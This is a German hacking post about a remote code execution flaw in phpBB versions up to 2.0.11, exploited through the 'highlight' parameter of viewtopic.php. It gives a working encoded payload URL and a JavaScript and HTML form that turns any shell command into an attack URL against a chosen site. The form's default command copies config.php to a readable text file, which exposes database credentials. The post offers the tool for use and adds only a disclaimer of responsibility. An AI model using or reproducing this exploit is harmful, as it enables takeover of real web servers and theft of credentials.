Phpbb 2.xx Hack
Beim phpBB bis zur Version phpBB 2.0.11 kann man über einen Bug in der
viewtopic.php einen beliebigen Code ausführen.
Beschreibung:
Wenn man bei der viewtopic.php den String "highlight" mitsendet und
ihn entsprechent codiert kann man zum Beispiel auf einem Windows-Server (was zum
Glück nicht so oft) jeden Dos Befehl ausführen lassen den man will. Das
gleiche gilt natürlich auch für Linux.
Hier ein Beispiel: viewtopic.php?t=1&highlight=%2527%252esystem(chr(104)%252echr(101)%252echr(108)%252echr(112))%252e%2527
Der Codierte String wird von der viewtopic "entschlüsselt" und
verarbeitet. Dieses Beispiel sendet den harmlosen Befehl "help".
Um den String zu codieren gibt es dieses kleine Skript :
<script language="JavaScript">
<!--
function start()
{
var command = document.form.command.value;
var split = command.split("");
var array = new Array();
for (var a=0; a<command.length; a++){
if(a==command.length-1) {
var crypt = "chr("+split[a].charCodeAt()+")";
}
else {
var crypt = "chr("+split[a].charCodeAt()+")%252e";
}
array.push(crypt);
}
document.form.action = document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value+"&highlight=%2527%252esystem("+array.join("")+")%252e%2527";
}
function check()
{
var url=document.form.url.value+"/viewtopic.php?t="+document.form.threadid.value;
window.open(url);
}
//-->
</script>
<noscript></noscript>
<form method="post" name="form" onSubmit="return start()">
<table width="98%" cellspacing="1" cellpadding="4" border="0" align="center" class="forumline">
<tr>
<th class="thHead" colspan="2">Hack 4 phpBB 2.0.11</th>
</tr>
<tr>
<td class="row2" colspan="2"><span class="gensmall">Items marked with a * are required unless stated otherwise</span></td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">URL: *</span></td>
<td class="row2">
<input type="text" name="url" size="50" value="http://www.example.com/phpBB2" /> <a href="javascript:check()">check</a>
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Threadid: *</span></td>
<td class="row2">
<input type="text" name="threadid" size="50" value="1" />
</td>
</tr>
<tr>
<td class="row1" width="38%"><span class="gen">Command: *</span></td>
<td class="row2">
<input type="text" name="command" size="50" value="copy config.php config.txt" />
</td>
</tr>
<tr>
<td class="catBottom" colspan="2" align="center">
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" />
</td>
</tr>
<tr>
</tr>
</table></form> |
Wer den Text nutzt, ist für die Folgen selbst verantwortlich.
|